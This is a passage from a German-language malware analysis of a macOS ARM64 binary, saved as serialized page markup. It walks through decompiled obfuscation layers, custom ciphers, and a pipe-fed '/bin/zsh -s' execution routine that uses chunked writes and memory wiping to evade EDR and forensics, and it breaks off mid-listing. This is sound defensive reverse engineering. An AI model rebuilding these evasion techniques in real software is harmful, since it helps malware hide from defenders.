Binärdaten. Die Ausgabe eines Layer-1-Triplet-Decodes ist ein String aus Hex-Paaren: ",[1524,2483,2484],{},"32694e5462...",". Das wird durch die Decoder-Funktion ",[1524,2487,2488],{},"FUN_100000dc0",[1524,2490,2491],{},"0x100000dc0"," bestätigt, die einen Hex-Decode über eine Lookup-Tabelle bei ",[1524,2494,2495],{},"DAT_1007bb591"," implementiert.",[806,2498,2499,2500,2356,2503,2289,2506,2356,2509,2289,2512,2356,2515,2518],{},"Der Ghidra-Decompile zeigt eine Switch-Anweisung, die jedes Hex-Zeichen (",[1524,2501,2502],{},"0x30",[1524,2504,2505],{},"0x39",[1524,2507,2508],{},"0x41",[1524,2510,2511],{},"0x46",[1524,2513,2514],{},"0x61",[1524,2516,2517],{},"0x66",") auf seinen Nibble-Wert abbildet und Ausgabebytes jeweils zwei Zeichen auf einmal zusammensetzt:",[1541,2520,2521],{"style":1543},[2009,2522,2523,2526,2529,2532,2533,2536,2537,2539,2540,2025,2543,2545,2546,2549,2550,1905,2553,2025,2555,2558,2559,2388,2562,2564,2565,1905,2568,2025,2570,2558,2573,2388,2576,2564,2578,1905,2581,1905,2584,2025,2586,2545,2588,2025,2590,2558,2592,2388,2595,2597,2598,1905,2601,2025,2603,2545,2606,2025,2608,2558,2611,2388,2614,2597,2616,1905,2619,2025,2621,2545,2624,2025,2626,2629,2630,2388,2633,2597,2635,1905,2638,2025,2640,2545,2643,2025,2645,2648,2649,2388,2652,2597,2654,1905,2657,2025,2659,2545,2662,2025,2664,2558,2667,2388,2670,2597,2672,1905,2675,2025,2677,2545,2679,2025,2681,2558,2683,2388,2686,2597,2688,2691,2692,2695,2696,2536,2699,2701,2702,2704,2705,2708],{},[1588,2524,2525],{"style":2013},"// FUN_100000dc0 @ 0x100000dc0",[1588,2527,2528],{"style":2013},"// Hex decoder, processes input two characters per output byte",[1588,2530,2531],{"style":2023},"switch","(*(",[1588,2534,2535],{"style":2023},"undefined1"," *)((",[1588,2538,2241],{"style":2023},")plVar2 + lVar7)) {\n ",[1588,2541,2542],{"style":2023},"case",[1588,2544,2502],{"style":2049},": ",[1588,2547,2548],{"style":2023},"break","; ",[1588,2551,2552],{"style":2013},"// '0' → 0x00",[1588,2554,2542],{"style":2023},[1588,2556,2557],{"style":2049},"0x31",": bVar9 = ",[1588,2560,2561],{"style":2049},"0x10",[1588,2563,2548],{"style":2023},"; ",[1588,2566,2567],{"style":2013},"// '1' → 0x10",[1588,2569,2542],{"style":2023},[1588,2571,2572],{"style":2049},"0x32",[1588,2574,2575],{"style":2049},"0x20",[1588,2577,2548],{"style":2023},[1588,2579,2580],{"style":2013},"// '2' → 0x20",[1588,2582,2583],{"style":2013},"// ... '3' through '9' ...",[1588,2585,2542],{"style":2023},[1588,2587,2508],{"style":2049},[1588,2589,2542],{"style":2023},[1588,2591,2514],{"style":2049},[1588,2593,2594],{"style":2049},"0xa0",[1588,2596,2548],{"style":2023},"; ",[1588,2599,2600],{"style":2013},"// 'A'/'a' → 0xa0",[1588,2602,2542],{"style":2023},[1588,2604,2605],{"style":2049},"0x42",[1588,2607,2542],{"style":2023},[1588,2609,2610],{"style":2049},"0x62",[1588,2612,2613],{"style":2049},"0xb0",[1588,2615,2548],{"style":2023},[1588,2617,2618],{"style":2013},"// 'B'/'b' → 0xb0",[1588,2620,2542],{"style":2023},[1588,2622,2623],{"style":2049},"0x43",[1588,2625,2542],{"style":2023},[1588,2627,2628],{"style":2049},"99",": bVar9 = ",[1588,2631,2632],{"style":2049},"0xc0",[1588,2634,2548],{"style":2023},[1588,2636,2637],{"style":2013},"// 'C'/'c' → 0xc0",[1588,2639,2542],{"style":2023},[1588,2641,2642],{"style":2049},"0x44",[1588,2644,2542],{"style":2023},[1588,2646,2647],{"style":2049},"100",": bVar9 = ",[1588,2650,2651],{"style":2049},"0xd0",[1588,2653,2548],{"style":2023},[1588,2655,2656],{"style":2013},"// 'D'/'d' → 0xd0",[1588,2658,2542],{"style":2023},[1588,2660,2661],{"style":2049},"0x45",[1588,2663,2542],{"style":2023},[1588,2665,2666],{"style":2049},"0x65",[1588,2668,2669],{"style":2049},"0xe0",[1588,2671,2548],{"style":2023},[1588,2673,2674],{"style":2013},"// 'E'/'e' → 0xe0",[1588,2676,2542],{"style":2023},[1588,2678,2511],{"style":2049},[1588,2680,2542],{"style":2023},[1588,2682,2517],{"style":2049},[1588,2684,2685],{"style":2049},"0xf0",[1588,2687,2548],{"style":2023},[1588,2689,2690],{"style":2013},"// 'F'/'f' → 0xf0","\n}\n",[1588,2693,2694],{"style":2013},"// Second nibble from lookup table at DAT_1007bb591","\n*(",[1588,2697,2698],{"style":2023},"byte",[1588,2700,2241],{"style":2023},")pppppppuVar3 + uVar8) =\n (&DAT_1007bb591)[(",[1588,2703,2066],{"style":2023},")uVar4 & ",[1588,2706,2707],{"style":2049},"0xff","] | bVar9;\n",[806,2710,2711],{},"Der ARM64-Assembly treibt dies mit einer sekundären Computed-Branch-Tabelle an und implementiert so faktisch eine 55-Einträge-Sprungtabelle für den Switch:",[1541,2713,2714],{"style":1543},[1545,2715,2718],{"className":2716,"code":2717,"language":916},[1548],"100000e5c: adr x17,0x100000e6c ; base of case-dispatch table\n100000e60: ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64: add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68: br x17 ; jump — second computed branch in 24 bytes\n",[1524,2719,2717],{"__ignoreMap":863},[806,2721,2722],{},"Zwei berechnete Branches in einem 24-Byte-Fenster. Statische Analysetools kommen mit diesem Muster nicht zurecht, weil beide Branch-Ziele zur Analysezeit unbekannt sind.",[806,2724,2725],{},"Ein 137.208 Zeichen langer Hex-String ergibt nach der Dekodierung 68.604 Byte, die dann in Layer 3 eingespeist werden.",[1508,2727],{},[1671,2729,2731],{"id":2730},"layer-3-benutzerdefiniertes-16-symbol-nibble-alphabet","Layer 3: Benutzerdefiniertes 16-Symbol-Nibble-Alphabet",[806,2733,1677],{},[806,2735,2736],{},"Die 68.604 Ausgabebytes aus Layer 2 verwenden nur 16 eindeutige Bytewerte aus zwei nicht zusammenhängenden ASCII-Bereichen:",[2738,2739,2740,2790],"ul",{},[2741,2742,2743,2746,2747,2289,2750,2289,2753,2289,2756,2289,2759,2289,2762,2289,2765,2289,2768,2289,2770,2289,2773,2289,2776,2289,2779,2289,2782,2289,2784,2289,2787],"li",{},[1524,2744,2745],{},"0x20-0x2F",": Leerzeichen, ",[1524,2748,2749],{},"!",[1524,2751,2752],{},"\"",[1524,2754,2755],{},"#",[1524,2757,2758],{},"$",[1524,2760,2761],{},"%",[1524,2763,2764],{},"&",[1524,2766,2767],{},"'",[1524,2769,2030],{},[1524,2771,2772],{},")",[1524,2774,2775],{},"*",[1524,2777,2778],{},"+",[1524,2780,2781],{},",",[1524,2783,2356],{},[1524,2785,2786],{},".",[1524,2788,2789],{},"/",[2741,2791,2792,2545,2795,2289,2798,2289,2801,2289,2804,2289,2807,2289,2810,2289,2813,2816],{},[1524,2793,2794],{},"0x78-0x7F",[1524,2796,2797],{},"x",[1524,2799,2800],{},"y",[1524,2802,2803],{},"z",[1524,2805,2806],{},"{",[1524,2808,2809],{},"|",[1524,2811,2812],{},"}",[1524,2814,2815],{},"~",", DEL",[806,2818,2819],{},"Das ist eine bewusste Designentscheidung. In einem Hex-Editor sehen diese Bytes aus wie Leerzeichen, Satzzeichen und ASCII-Randzeichen; sie verschwimmen im Rauschen dessen, was wie Metadaten oder Padding wirkt. Ein Analyst, der einen Hex-Dump überfliegt, wird diese Bytebereiche nicht als verdächtig markieren, und Standard-Entropieanalysen unterschätzen die effektive Entropie, weil die Byteverteilung nicht zufällig erscheint.",[806,2821,2822,2823,2826,2827,2830,2831,2834,2835,2838],{},"Jedes Byte aus diesem Alphabet kodiert ein Nibble des eigentlichen Payloads. Die Alphabet-zu-Nibble-Zuordnung wird von der Encode-/Decode-Funktion ",[1524,2824,2825],{},"FUN_100000d60"," angewendet, die wir bei ",[1524,2828,2829],{},"0x100000d60"," bestätigten. Sie verkettet zwei Sub-Funktionen: ",[1524,2832,2833],{},"FUN_100000b50"," erstellt eine indizierte Map der Zeichen des Eingabe-Strings, und ",[1524,2836,2837],{},"FUN_100000c34"," durchläuft diese Map, verbraucht 6 Bit pro Schritt und akkumuliert Ausgabebytes 8 Bit auf einmal:",[1541,2840,2841],{"style":1543},[2009,2842,2843,2846,2847,2849,2850,2852,2853,2855,2856,2859,2860,1905,2863,2865,2866,2868,2869,1909,2872,2874,2875,2878,2879,2881,2882,1909,2885,2887,2888,2891,2892,2895,2896,2898,2899,2902,2903,2905,2906,2536,2909,2911,2912,2914,2915,2917],{},[1588,2844,2845],{"style":2013},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[1588,2848,2292],{"style":2049},";\n",[1588,2851,2311],{"style":2023}," {\n local_52 = *(",[1588,2854,2535],{"style":2023}," *)puVar4;\n lVar3 = ",[1588,2857,2858],{"style":2028},"FUN_1000a078c","(param_3, &local_52); ",[1588,2861,2862],{"style":2013},"// look up nibble value",[1588,2864,2318],{"style":2023}," (lVar3 == ",[1588,2867,2292],{"style":2049},") {\n ",[1588,2870,2871],{"style":2013},"// character not in alphabet, treat as raw",[1588,2873,2858],{"style":2028},"(param_3, &local_51);\n } ",[1588,2876,2877],{"style":2023},"else"," {\n iVar5 = iVar5 + ",[1588,2880,2070],{"style":2049},"; ",[1588,2883,2884],{"style":2013},"// accumulate 4 bits",[1588,2886,2395],{"style":2023}," (",[1588,2889,2890],{"style":2049},"7"," \u003C iVar5) {\n std::string::",[1588,2893,2894],{"style":2028},"push_back","((",[1588,2897,2326],{"style":2023},")param_1); ",[1588,2900,2901],{"style":2013},"// emit byte when 8+ bits ready","\n iVar5 = iVar5 + -",[1588,2904,2307],{"style":2049},";\n }\n }\n puVar4 = (",[1588,2907,2908],{"style":2023},"undefined8",[1588,2910,2241],{"style":2023},")puVar4 + ",[1588,2913,2322],{"style":2049},");\n} ",[1588,2916,2395],{"style":2023}," (puVar4 != puVar1);\n",[806,2919,2920],{},"Die 34.302 Byte, die aus diesem Durchlauf hervorgehen, sind zu 99,7% druckbares ASCII. Auf den ersten flüchtigen Blick sieht der Payload in dieser Stufe aus wie ein großes Shell-Skript oder ein Konfigurations-Blob.",[1508,2922],{},[1671,2924,2926],{"id":2925},"layer-4-compile-time-string-obfuskierung","Layer 4: Compile-Time-String-Obfuskierung",[806,2928,1677],{},[806,2930,2931],{},"Intern genutzte Strings werden zur Kompilierzeit mit demselben Triplet-Schema wie Layer 1 obfuskiert und zur Laufzeit unmittelbar vor ihrer Verwendung rekonstruiert. Im Speicher halten sie sich nie länger als nötig auf; der Buffer wird nach dem Verbrauch sofort freigegeben. In den statischen Datensektionen der Binary ist zu keinem Zeitpunkt ein dekodierter String sichtbar.",[806,2933,2934,2935,2938],{},"Die String-Hash-Funktion ",[1524,2936,2937],{},"FUN_100000730"," liefert eine sekundäre Obfuskierungsschicht für String-Vergleiche. Statt Strings direkt zu vergleichen, was Klartext im Speicher hinterlassen würde, berechnet und vergleicht die Binary Integer-Hashes:",[1541,2940,2941],{"style":1543},[2009,2942,2943,2946,2949,2025,2951,2030,2953,2242,2955,2957,2958,2961,2962,1905,2965,1905,2968,2971,2972,2974,2975,2977,2978,2980,2981,2597,2984,2987,2988,2990,2991,2993],{},[1588,2944,2945],{"style":2013},"// FUN_100000730 @ 0x100000730",[1588,2947,2948],{"style":2013},"// FNV-style string hash, avoids plaintext string comparisons",[1588,2950,2036],{"style":2023},[1588,2952,2937],{"style":2028},[1588,2954,2326],{"style":2023},[1588,2956,2036],{"style":2023}," iVar4 = ",[1588,2959,2960],{"style":2049},"0x19a8","; ",[1588,2963,2964],{"style":2013},"// FNV offset basis (modified)",[1588,2966,2967],{"style":2013},"// ...",[1588,2969,2970],{"style":2023},"for"," (; uVar3 != ",[1588,2973,2292],{"style":2049},"; uVar3 = uVar3 - ",[1588,2976,2322],{"style":2049},") {\n iVar4 = (",[1588,2979,2036],{"style":2023},")*pcVar1 + iVar4 * -",[1588,2982,2983],{"style":2049},"0x7fb91be3",[1588,2985,2986],{"style":2013},"// FNV-1a style multiply","\n pcVar1 = pcVar1 + ",[1588,2989,2322],{"style":2049},";\n }\n ",[1588,2992,2078],{"style":2023}," iVar4;\n}\n",[806,2995,2996],{},"Der ARM64-Assembly ersetzt die Multiplikation durch ein Fused Multiply-Add:",[1541,2998,2999],{"style":1543},[1545,3000,3003],{"className":3001,"code":3002,"language":916},[1548],"100000744: mov w0,#0x19a8 ; FNV basis\n100000750: mov w10,#0xe41d\n100000754: movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758: ldrsb w11,[x8], #0x1 ; load char, post-increment\n10000075c: madd w0,w0,w10,w11 ; w0 = w0 * 0x8046e41d + char\n100000760: subs x9,x9,#0x1\n100000764: b.ne 0x100000758\n",[1524,3004,3002],{"__ignoreMap":863},[806,3006,3007],{},"Das bedeutet, dass selbst ein Vergleich zweier Strings innerhalb der Binary keinen Branch erzeugt, den ein Debugger sauber auf String-Ebene abfangen kann, sondern nur auf Hash-Ebene.",[1508,3009],{},[1671,3011,3013],{"id":3012},"layer-5-duale-custom-stream-cipher-instanzen","Layer 5: Duale Custom-Stream-Cipher-Instanzen",[806,3015,1677],{},[806,3017,3018,3019,3022],{},"An dieser Stelle wird die Obfuskierungsarchitektur ungewöhnlich. In der Binary laufen nicht eine, sondern ",[1736,3020,3021],{},"zwei separate Cipher-Instanzen",", jede mit einer anderen hartcodierten Lookup-Tabelle und einem anderen Startzähler. Beide verwenden dieselbe Algorithmusstruktur, erzeugen aber unterschiedliche Ausgabe-Alphabete für verschiedene Teile der Payload-Pipeline.",[806,3024,3025,2289,3028,2203,3031,3034],{},[1736,3026,3027],{},"Instanz A",[1524,3029,3030],{},"FUN_10007ab34",[1524,3032,3033],{},"0x10007ab34",":",[1541,3036,3037],{"style":1543},[2009,3038,3039,3042,3043,2849,3046,3048,3049,2536,3051,3053,3054,3056,3057,2536,3059,3061,3062,3064,3065,2536,3067,3069,3070,3072,3073,3076,3077,3079,3080,3082],{},[1588,3040,3041],{"style":2013},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[1588,3044,3045],{"style":2049},"0x4c",[1588,3047,2311],{"style":2023}," {\n bVar2 = *(",[1588,3050,2698],{"style":2023},[1588,3052,2241],{"style":2023},")local_e0 +\n ((",[1588,3055,2066],{"style":2023},")(*(",[1588,3058,2698],{"style":2023},[1588,3060,2241],{"style":2023},")local_c8 + uVar5) ^ uVar6) & ",[1588,3063,2707],{"style":2049},"));\n *(",[1588,3066,2698],{"style":2023},[1588,3068,2241],{"style":2023},")plVar1 + uVar5) = bVar2;\n uVar6 = (",[1588,3071,2036],{"style":2023},")uVar5 + (uVar6 ^ bVar2); ",[1588,3074,3075],{"style":2013},"// counter: i + (counter XOR output)","\n uVar5 = uVar5 + ",[1588,3078,2322],{"style":2049},";\n} ",[1588,3081,2395],{"style":2023}," (uVar7 != uVar5);\n",[806,3084,3085,2289,3088,2203,3091,3034],{},[1736,3086,3087],{},"Instanz B",[1524,3089,3090],{},"FUN_10007a7e0",[1524,3092,3093],{},"0x10007a7e0",[1541,3095,3096],{"style":1543},[2009,3097,3098,3042,3101,2849,3104,3048,3106,2536,3108,3110,3111,3056,3113,2536,3115,3117,3118,3064,3120,2536,3122,3069,3124,3072,3126,3076,3129,3079,3131,3082],{},[1588,3099,3100],{"style":2013},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[1588,3102,3103],{"style":2049},"0x9f",[1588,3105,2311],{"style":2023},[1588,3107,2698],{"style":2023},[1588,3109,2241],{"style":2023},")local_c0 +\n ((",[1588,3112,2066],{"style":2023},[1588,3114,2698],{"style":2023},[1588,3116,2241],{"style":2023},")local_a8 + uVar5) ^ uVar6) & ",[1588,3119,2707],{"style":2049},[1588,3121,2698],{"style":2023},[1588,3123,2241],{"style":2023},[1588,3125,2036],{"style":2023},[1588,3127,3128],{"style":2013},"// identical counter update formula",[1588,3130,2322],{"style":2049},[1588,3132,2395],{"style":2023},[806,3134,3135,3136,3138,3139,3141],{},"Der Algorithmus ist strukturell identisch, aber der Startzähler unterscheidet sich (",[1524,3137,3045],{}," vs. ",[1524,3140,3103],{},") und die Lookup-Tabellen liegen an verschiedenen Speicheradressen. Instanz A wird aus Zustand 11 der Zustandsmaschine aufgerufen, um das Kodierungsalphabet für den ersten Payload-Pfad zu erzeugen. Instanz B wird aus Zustand 6 aufgerufen, um das Alphabet für den Decode des großen Shell-Skript-Payloads zu erzeugen.",[806,3143,3144,3145,3148,3149,3152,3153,3156],{},"Präzise formuliert: Es handelt sich um eine ",[1736,3146,3147],{},"Substitutionschiffre mit zählerabhängigem Index",". Jedes Ausgabebyte ist ein Tabellen-Lookup, bei dem der Index ",[1524,3150,3151],{},"(input_byte XOR counter) & 0xFF"," ist. Der Zähler aktualisiert sich nach jedem Byte als ",[1524,3154,3155],{},"counter = (i + (counter XOR output)) & 0xFF",", was bedeutet, dass jedes Ausgabebyte die Bestimmung des nächsten Lookup-Index beeinflusst. Das erzeugt eine Abhängigkeitskette über die gesamte Ausgabesequenz: Byte N lässt sich nicht entschlüsseln, ohne die Bytes 0 bis N-1 korrekt entschlüsselt zu haben. Partielle Entschlüsselung oder Fehleranalyse werden dadurch erheblich schwieriger.",[806,3158,3159],{},"Keine der Instanzen ist Standard-RC4. Es gibt keine S-Box-Initialisierungsphase, keine S-Box-Swap-Operation. Die Lookup-Tabellen sind statische, zur Kompilierzeit eingebettete Konstanten.",[1508,3161],{},[1671,3163,3165],{"id":3164},"layer-6-runtime-xor-mit-exit-code-abhängigem-schlüssel","Layer 6: Runtime-XOR mit Exit-Code-abhängigem Schlüssel",[806,3167,1677],{},[806,3169,3170,3171,3174],{},"Die letzte und analytisch anspruchsvollste Schicht wendet eine In-Place-XOR-Transformation auf den Stage-2-Payload an. Der XOR-Schlüssel ist nicht hartcodiert, sondern wird zur Laufzeit aus dem Exit-Code der ",[1736,3172,3173],{},"ersten Shell-Payload-Ausführung"," abgeleitet, und ist damit durch statische Analyse prinzipiell nicht bestimmbar. Die Binary muss tatsächlich ausgeführt werden und das erste Shell-Skript bis zum Ende laufen, bevor der Schlüssel überhaupt existiert.",[806,3176,3177],{},"Die Schlüsselableitungssequenz im ARM64-State-Machine-Dispatcher:",[1541,3179,3180],{"style":1543},[1545,3181,3184],{"className":3182,"code":3183,"language":916},[1548],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838: ubfx w8,w0,#0x8,#0x8 ; extract bits [15:8] of exit status\n10009f83c: mov w9,#0x7f0 ; multiplier constant\n10009f840: madd w8,w8,w9,w26 ; key = (exit_byte × 0x7f0) + base_counter\n10009f844: and w24,w8,#0xffff ; mask to 16-bit key → stored in w24\n",[1524,3185,3183],{"__ignoreMap":863},[806,3187,3188],{},"Der XOR-Loop, der den Stage-2-Payload verarbeitet:",[1541,3190,3191],{"style":1543},[1545,3192,3195],{"className":3193,"code":3194,"language":916},[1548],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34: ldrb w10,[x8, x9, LSL ] ; load payload byte\n10009fc48: eor w10,w10,w24 ; XOR with key\n10009fc4c: strb w10,[x8, x9, LSL ] ; write decrypted byte in place\n",[1524,3196,3194],{"__ignoreMap":863},[806,3198,3199,3200,3203,3204,3207,3208,3210],{},"Der Schlüssel ist ein 16-Bit-Wert, der aus dem Exit-Status-Byte des ersten Shell-Payloads abgeleitet, mit ",[1524,3201,3202],{},"0x7f0"," multipliziert und zum aktuellen Wert des Basiszählerregisters ",[1524,3205,3206],{},"w26"," der Zustandsmaschine addiert wird. Die Multiplikationskonstante ",[1524,3209,3202],{}," bewirkt, dass ein Einzelbit-Unterschied im Exit-Code einen völlig anderen Schlüssel erzeugt. Es gibt keine ausnutzbare Kontinuität zwischen benachbarten Schlüsselwerten.",[806,3212,3213],{},"Ohne die Binary in einer kontrollierten Umgebung auszuführen und den genauen Exit-Code des ersten Shell-Payloads aufzuzeichnen, bleibt der Stage-2-Payload für die statische Analyse dauerhaft undurchsichtig. Das war die schwierigste Hürde der gesamten Analyse.",[1508,3215],{},[810,3217,3219],{"id":3218},"shell-ausführung-pipes-statt-argumente-und-simd-xor","Shell-Ausführung: Pipes statt Argumente, und SIMD-XOR",[806,3221,1536],{},[806,3223,3224,3225,2203,3228,3231],{},"Die Shell-Ausführungsfunktion ",[1524,3226,3227],{},"FUN_10000091c",[1524,3229,3230],{},"0x10000091c"," ist die architektonisch interessanteste Komponente der Binary. Hier läuft alles zusammen: der dekodierte Payload, der obfuskierte Befehlsname und das explizite Anti-Forensik-Design. Jede Designentscheidung in dieser Funktion verfolgt einen spezifischen Evasionszweck.",[1671,3233,3235],{"id":3234},"schritt-1-der-befehlsname-erscheint-nie-im-klartext","Schritt 1: Der Befehlsname erscheint nie im Klartext",[806,3237,1677],{},[806,3239,3240,3243,3244,3247,3248,3251,3252,3255],{},[1524,3241,3242],{},"/bin/zsh"," existiert nirgendwo in der Binary als Klartext. Im ",[1524,3245,3246],{},"__cstring","-Abschnitt bei ",[1524,3249,3250],{},"0x1007bb5c8"," liegt der String als obfuskierte Bytes ",[1524,3253,3254],{},"\\x01LG@\\x01T]F",". Die Dekodierung erfolgt zur Laufzeit über eine einzelne XOR-Operation, direkt im ARM64-Assembly verifizierbar:",[1541,3257,3258],{"style":1543},[1545,3259,3262],{"className":3260,"code":3261,"language":916},[1548],"; FUN_10000091c — command name decode via SIMD XOR\n100000960: adrp x8,0x1007bb000\n100000964: add x8,x8,#0x5c8 ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968: ldr x8,[x8] ; load 8 obfuscated bytes as uint64\n10000096c: str x8,[sp, #0x20]\n100000970: strb wzr,[sp, #0x28] ; null terminator\n\n100000974: ldr d0,[sp, #0x20] ; load into SIMD register d0\n100000978: movi v1.8B,#0x2e ; broadcast 0x2e to all 8 lanes of v1\n10000097c: eor v0.8B,v0.8B,v1.8B ; XOR all 8 bytes simultaneously\n100000980: str d0,[sp, #0x20] ; store decoded \"/bin/zsh\"\n\n100000988: mov w8,#0x732d ; 0x732d = \"-s\" (little-endian)\n10000098c: strh w8,[sp, #0x4] ; store argument string\n",[1524,3263,3261],{"__ignoreMap":863},[806,3265,3266,3267,3270,3271,3273,3274,3277],{},"Der XOR-Schlüssel ist ",[1524,3268,3269],{},"0x2e",", der ASCII-Wert von ",[1524,3272,2786],{}," (Punkt). Die Dekodierung geschieht in einer einzigen ",[1524,3275,3276],{},"eor v0.8B, v0.8B, v1.8B","-Instruktion, einem ARM64-NEON-Vektorbefehl, der alle 8 Bytes gleichzeitig XOR-verknüpft. Eine SIMD-Instruktion für einen einfachen 8-Byte-Decode zu verwenden ist ungewöhnlich und hat zwei Effekte: schneller als eine Byte-für-Byte-Schleife, und das erzeugte Instruktionsmuster unterscheidet sich grundlegend von skalaren Decode-Schleifen, auf die Signatur-Matching-Tools trainiert sind.",[806,3279,3280,3281,2289,3284,2289,3287,2289,3290,3293,3294,3297],{},"Die Verifikation ist einfach: ",[1524,3282,3283],{},"0x01 XOR 0x2e = 0x2f = /",[1524,3285,3286],{},"0x4c XOR 0x2e = 0x62 = b",[1524,3288,3289],{},"0x47 XOR 0x2e = 0x69 = i",[1524,3291,3292],{},"0x40 XOR 0x2e = 0x6e = n",", was in den ersten vier Bytes ",[1524,3295,3296],{},"/bin"," ergibt.",[1671,3299,3301],{"id":3300},"schritt-2-die-pipe-architektur","Schritt 2: Die Pipe-Architektur",[806,3303,1677],{},[806,3305,3306],{},"Nach dem Dekodieren des Befehlsnamens legt die Funktion eine OS-Pipe an und forkt:",[1541,3308,3309],{"style":1543},[1545,3310,3313],{"className":3311,"code":3312,"language":916},[1548],"100000990: bl 0x1000a0f6c ; _fork()\n100000994: mov x20,x0 ; save PID\n100000998: cbz w0,0x100000b00 ; if child: jump to exec path\n",[1524,3314,3312],{"__ignoreMap":863},[806,3316,3317],{},"Im Child-Prozess:",[1541,3319,3320],{"style":1543},[1545,3321,3324],{"className":3322,"code":3323,"language":916},[1548],"; Child process path\n100000b0c: mov w1,#0x0\n100000b10: bl 0x1000a0f48 ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c: add x0,sp,#0x20 ; argv[0] = \"/bin/zsh\"\n100000b30: add x1,sp,#0x8 ; argv array\n100000b34: bl 0x1000a0f60 ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[1524,3325,3323],{"__ignoreMap":863},[806,3327,3328,3329,3332,3333,3336,3337,3339],{},"Der Child-Prozess ersetzt seinen Standard-Input durch das Lese-Ende der Pipe und startet ",[1524,3330,3331],{},"/bin/zsh -s",". Im ",[1524,3334,3335],{},"-s","-Modus liest die Shell Befehle von stdin. Für Process-Monitoring-Tools erscheint dieser Prozess als ",[1524,3338,3331],{}," ohne Argumente, nicht zu unterscheiden von einer legitimen interaktiven Shell-Session.",[1671,3341,3343],{"id":3342},"schritt-3-chunk-writes-variabler-größe","Schritt 3: Chunk-Writes variabler Größe",[806,3345,1677],{},[806,3347,3348],{},"Der Parent-Prozess schreibt den entschlüsselten Payload in bewusst variierenden Chunk-Größen an das Schreib-Ende der Pipe:",[1541,3350,3351],{"style":1543},[1545,3352,3355],{"className":3353,"code":3354,"language":916},[1548],"; Parent: compute chunk size then write\n1000009d4: umulh x8,x23,x24 ; high-half multiply for modulo\n1000009d8: lsr x8,x8,#0x7\n1000009dc: msub x8,x8,x25,x23 ; x8 = length % 0xc0\n1000009e0: add x8,x8,#0x40 ; chunk = (length % 192) + 64\n ; range: 64 to 255 bytes per write\n1000009e4: cmp x8,x23 ; clamp to remaining length\n1000009e8: csel x2,x8,x23,cc\n\n1000009ec: ldr w0,[sp, #0x34] ; pipe write fd\n1000009f0: mov x1,x21 ; payload pointer\n1000009f4: bl 0x1000a0fc0 ; _write(fd, buf, chunk_size)\n\n100000a04: mov w0,#0x1\n100000a08: bl 0x1000a0fa8 ; _usleep(1), 1µs between chunks\n100000a0c: add x21,x21,x22 ; advance pointer\n100000a10: sub x23,x23,x22 ; reduce remaining count\n100000a14: cbnz x23,0x1000009d4 ; loop until done\n",[1524,3356,3354],{"__ignoreMap":863},[806,3358,3359,3360,3363,3364,3367,3368,3371,3372,3375],{},"Die Chunk-Größenformel ",[1524,3361,3362],{},"(remaining_length % 192) + 64"," erzeugt Werte zwischen 64 und 255 Byte pro Write-Aufruf, abhängig von der verbleibenden Payload-Länge. Das variable Write-Muster ist in Kernel-Event-Tracing-Tools wie ",[1524,3365,3366],{},"ktrace"," oder ",[1524,3369,3370],{},"dtrace"," sichtbar, erzeugt aber keine erkennbare Festgröße-Signatur. Jede Ausführung desselben Payloads produziert eine andere Sequenz von ",[1524,3373,3374],{},"write()","-Syscall-Größen.",[806,3377,3378,3379,3381],{},"Das 1-Mikrosekunden-",[1524,3380,2085],{}," zwischen den Chunks verfolgt einen zweiten Zweck: Es gibt die CPU zwischen den Schreibvorgängen frei, hält die CPU-Auslastung flach und vermeidet eine plötzliche Spitze, die eine verhaltensbasierte EDR-Regel als anomales Burst-I/O markieren könnte.",[1671,3383,3385],{"id":3384},"schritt-4-sofortige-speicherbereinigung","Schritt 4: Sofortige Speicherbereinigung",[806,3387,1677],{},[1541,3389,3390],{"style":1543},[1545,3391,3394],{"className":3392,"code":3393,"language":916},[1548],"; After all chunks written and pipe closed:\n100000a20: ldrb w8,[x19, #0x17] ; check string storage type\n100000a24: sxtb w9,w8\n100000a28: ldp x10,x11,[x19]\n100000a30: csel x0,x10,x19,lt ; pointer to payload buffer\n100000a34: csel x1,x11,x8,lt ; length of buffer\n100000a38: bl 0x1000a0f30 ; _bzero(payload_buf, length)\n",[1524,3395,3393],{"__ignoreMap":863},[806,3397,2445,3398,3401],{},[1524,3399,3400],{},"_bzero()","-Aufruf nullt den gesamten entschlüsselten Payload-Buffer unmittelbar nach dem letzten Schreibvorgang in die Pipe. Kein Zeitfenster, nicht einmal eine Mikrosekunde, in der der entschlüsselte Payload nach Abschluss der Ausführung noch im Speicher läge. Ein Live-Memory-Dump, der direkt nach Rückkehr dieser Funktion erstellt wird, findet nur Nullen, wo der Payload war.",[806,3403,3404,3405,3408],{},"Das wird als ",[1736,3406,3407],{},"Zero-after-use"," bezeichnet, dieselbe Technik, die hochsichere kryptografische Bibliotheken einsetzen, damit Schlüsselmaterial nicht im Speicher verbleibt. Dass diese Technik in Commodity-Malware auftaucht, ist ungewöhnlich und lässt auf einen Entwickler mit Security-Engineering-Hintergrund schließen.",[1671,3410,3412],{"id":3411},"die-vollständige-ausführungssequenz","Die vollständige Ausführungssequenz:",[806,3414,1677],{},[1541,3416,3417],{"style":1543},[1545,3418,3421],{"className":3419,"code":3420,"language":916},[1548],"__cstring: \"\\x01LG@\\x01T]F\" (7 bytes, obfuscated)\n ↓ SIMD XOR with 0x2e (8-wide vector)\nstack: \"/bin/zsh\\0\" (decoded in-place, stack only)\n ↓ _pipe() creates fd pair [read=local_60, write=local_5c]\n ↓ _fork()\n │\n ├─ CHILD: _dup2(local_60, 0) stdin = pipe read end\n │ _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n │ → /bin/zsh reads commands from stdin (= pipe)\n │\n └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n _usleep(1)\n _close(local_5c) close write end → EOF to shell\n _bzero(payload, len) ← WIPE IMMEDIATELY\n _waitpid(child, 